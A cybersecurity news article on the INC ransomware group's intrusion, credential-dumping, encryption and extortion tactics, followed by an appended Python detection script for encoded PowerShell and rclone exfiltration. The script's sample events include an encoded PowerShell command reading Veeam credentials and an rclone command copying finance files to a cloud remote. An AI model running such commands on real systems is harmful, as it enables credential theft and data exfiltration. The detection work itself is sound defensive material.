INC Ransomware Uses LOLBins, RMM Tools, and rclone for Network Intrusion and Data Exfiltration


INC Ransomware Exfiltrates Data

The cybersecurity landscape faces a growing threat from INC ransomware, a highly active Ransomware-as-a-Service (RaaS) group that has claimed over 800 victims globally since its emergence in mid-2023.

Known for its aggressive double-extortion tactics, INC primarily targets high-profile organizations in the United States, specifically focusing on the legal, manufacturing, technology, and healthcare sectors.

The group’s rapid evolution has recently culminated in sophisticated Rust-based payloads capable of compromising both Windows and Linux/ESXi environments.


INC affiliates rely on diverse methods to breach corporate networks.

Initial access is typically achieved through spear-phishing campaigns, the purchase of credentials from initial access brokers, or the exploitation of known vulnerabilities in public-facing applications.

Commonly exploited flaws include Citrix NetScaler (CVE-2023-3519), Fortinet EMS (CVE-2023-48788), and Citrix Bleed 2 (CVE-2025-5777).

Once inside the network, the attackers use standard command-line tools and IP scanners to quietly map the environment.

INC ransom site (Source: Acronis)

To escalate privileges, the group deploys a highly customized Base64-encoded PowerShell script that dumps sensitive credentials directly from Veeam backup servers.

This specialized tool utilizes salted Data Protection API (DPAPI) decryption routines to extract administrative passwords, giving the attackers deep control over the victim’s infrastructure.

The group’s technical sophistication is evident in its ransomware payloads, which have been entirely rewritten in Rust.

This modern approach complicates reverse engineering while enabling cross-platform attacks. On Windows systems, the malware uses multithreading and a tiered, partial-encryption routine to drastically speed up encryption.

It actively avoids critical system files so the machine remains functional enough to display ransom notes on the desktop and physically print extortion demands on network printers.

The group also uses a dual-site extortion strategy, maintaining a private portal for ransom negotiations and a public leak site to pressure uncooperative victims, Acronis said.

2026 top ransomware groups (Source: Acronis)

On Linux and VMware ESXi servers, the payload is equally destructive. The malware uses built-in VMware management commands to shut down all running virtual machines before systematically encrypting them.

This ensures no crucial files are locked by the hypervisor, allowing for maximum data destruction across the virtualized environment.

Both the Windows and Linux payloads use advanced, hybrid encryption schemes that combine Curve25519 Elliptic Curve Cryptography and AES-128.

Defending against the INC ransomware requires a proactive, layered security strategy. Organizations must prioritize patching public-facing vulnerabilities and securing remote access points with robust multi-factor authentication.

Implementing strict network segmentation and limiting outbound traffic can disrupt the attackers’ use of RMM tools and rclone for data exfiltration.

Furthermore, deploying endpoint protection with anti-tamper capabilities is essential to block the group's attempts to impair defenses.

Finally, maintaining offline, immutable backups ensures that even if a network is fully encrypted, the organization can restore its critical operations without bowing to the group’s costly extortion demands.
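As an added defender-side illustration (not code from the article or from Acronis), the following Python flags two of the behaviours described above in process-creation telemetry: Base64-encoded PowerShell of the kind used for the Veeam credential-dumping script, and rclone copies to a remote. The event records and the keyword watchlist are constructed for this example and are not indicators from the write-up.

```python
"""Flag encoded-PowerShell and rclone-to-remote process events (constructed samples)."""
import base64
import re
import shlex

# Hypothetical watchlist: strings a decoded payload aimed at Veeam credential
# stores via DPAPI would plausibly contain (not indicators from the article).
PAYLOAD_KEYWORDS = ("veeam", "dpapi", "unprotect")
ENC_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# rclone remotes look like "name:path"; requiring 2+ chars skips drive letters (C:\).
REMOTE_ARG = re.compile(r"^[A-Za-z0-9_-]{2,}:")

def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE script text in Base64; '' if undecodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le", "replace")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_event(host, image, command_line):
    # Returns a finding dict for a suspicious event, else None.
    exe = image.rsplit("\\", 1)[-1].lower()
    args = shlex.split(command_line, posix=False)  # keeps Windows paths/quotes intact
    if exe in ("powershell.exe", "pwsh.exe"):
        for i, arg in enumerate(args[:-1]):
            if ENC_FLAG.match(arg):
                script = decode_encoded_command(args[i + 1])
                hits = [k for k in PAYLOAD_KEYWORDS if k in script.lower()]
                return {"host": host, "rule": "encoded_powershell", "keywords": hits}
    if exe in ("rclone.exe", "rclone"):
        verbs = [a for a in args if a.lower() in RCLONE_VERBS]
        remotes = [a for a in args if REMOTE_ARG.match(a)]
        if verbs and remotes:
            return {"host": host, "rule": "rclone_exfil", "remote": remotes[0]}
    return None

def _enc(script):  # build a -enc argument the way PowerShell expects it
    return base64.b64encode(script.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # (host, image, command line); constructed, not real telemetry
    ("backup01", "powershell.exe",
     "powershell.exe -nop -w hidden -enc " + _enc(r"Get-Item C:\Veeam\creds.db")),
    ("fs02", r"C:\Users\Public\rclone.exe",
     r'rclone.exe copy "D:\Finance\2025" mega:/share --transfers 8'),
    ("ws14", "powershell.exe", r"powershell.exe -File C:\scripts\inventory.ps1"),
]

def run_detections(events=SAMPLE_EVENTS):
    return [f for f in (analyze_event(*e) for e in events) if f]
```

Blocking outbound traffic is the control the article recommends; this logic is the matching detection layer, and any real deployment would tune the watchlist and remote-name pattern to the organization's own rclone and PowerShell usage.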
